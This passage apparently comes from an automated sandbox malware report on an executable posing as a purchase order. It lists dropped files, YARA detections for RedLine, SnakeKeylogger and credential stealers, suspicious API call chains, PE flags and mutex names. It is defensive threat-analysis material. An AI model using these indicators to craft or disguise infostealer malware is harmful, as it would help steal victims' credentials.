                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008BA81026_2_008BA810
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008979F026_2_008979F0
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008C2D4026_2_008C2D40
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008B92A026_2_008B92A0
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008BEEB026_2_008BEEB0
                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 26_2_008B93B026_2_008B93B0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CD7C0027_2_00CD7C00
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CFA81027_2_00CFA810
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CD79F027_2_00CD79F0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00D02D4027_2_00D02D40
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CF92A027_2_00CF92A0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CFEEB027_2_00CFEEB0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 27_2_00CF93B027_2_00CF93B0
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_0108828634_2_01088286
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_01086EAF34_2_01086EAF
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_01087B7134_2_01087B71
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_010B05D034_2_010B05D0
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_01087F8034_2_01087F80
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_0368102034_2_03681020
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeCode function: 34_2_0368103034_2_03681030
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_0645DAAC35_2_0645DAAC
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_06451B9435_2_06451B94
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_0645E60835_2_0645E608
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_0645255F35_2_0645255F
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_064525A835_2_064525A8
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_064525B835_2_064525B8
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_0645417435_2_06454174
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_06451D2035_2_06451D20
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_06451B2A35_2_06451B2A
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_06451B8835_2_06451B88
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeCode function: 35_2_064C341935_2_064C3419
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: String function: 0040E1D8 appears 43 times
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1799932026.0000000009BE9000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1741498534.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1776515513.00000000075F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000002.1748194036.000000000434A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000000.00000000.1691065458.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefCIh.exe2 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeBinary or memory string: OriginalFilename vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1750433396.00000000012A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1775030624.0000000003A19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStub.exe* vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1769417350.0000000003700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.00000000049A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1758588393.0000000003533000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1798563262.0000000005AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNet_microsofts_TradingAIBot.exe4 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exe, 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeBinary or memory string: OriginalFilenamefCIh.exe2 vs PO_2024_056209_MQ04865_ENQ_1045.exe
                          Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 10.2.zeXKjViL.exe.41ea2c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 19.0.Microsofts.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 10.2.zeXKjViL.exe.40802a8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 10.2.zeXKjViL.exe.40802a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000013.00000000.1742198538.0000000000202000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000008.00000002.1793222374.0000000004A24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: PO_2024_056209_MQ04865_ENQ_1045.exe PID: 8160, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: Process Memory Space: Microsofts.exe PID: 2124, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                          Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: DiagnosticsHub.StandardCollector.Service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: FXSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: DiagnosticsHub.StandardCollector.Service.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: FXSSVC.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          Source: PO_2024_056209_MQ04865_ENQ_1045.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: zeXKjViL.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Microsofts.exe.8.dr, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Microsofts.exe.8.dr, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                          Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@38/153@40/18
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeCode function: 8_2_02BFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_2_02BFCBD0
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Users\user\AppData\Roaming\zeXKjViL.exeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\zeXKjViL.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a5f0bea56967b89b7d8e3ee9-b
                          Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a5f0bea56967b89b9ea72c54-b
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a5f0bea56967b89b-inf
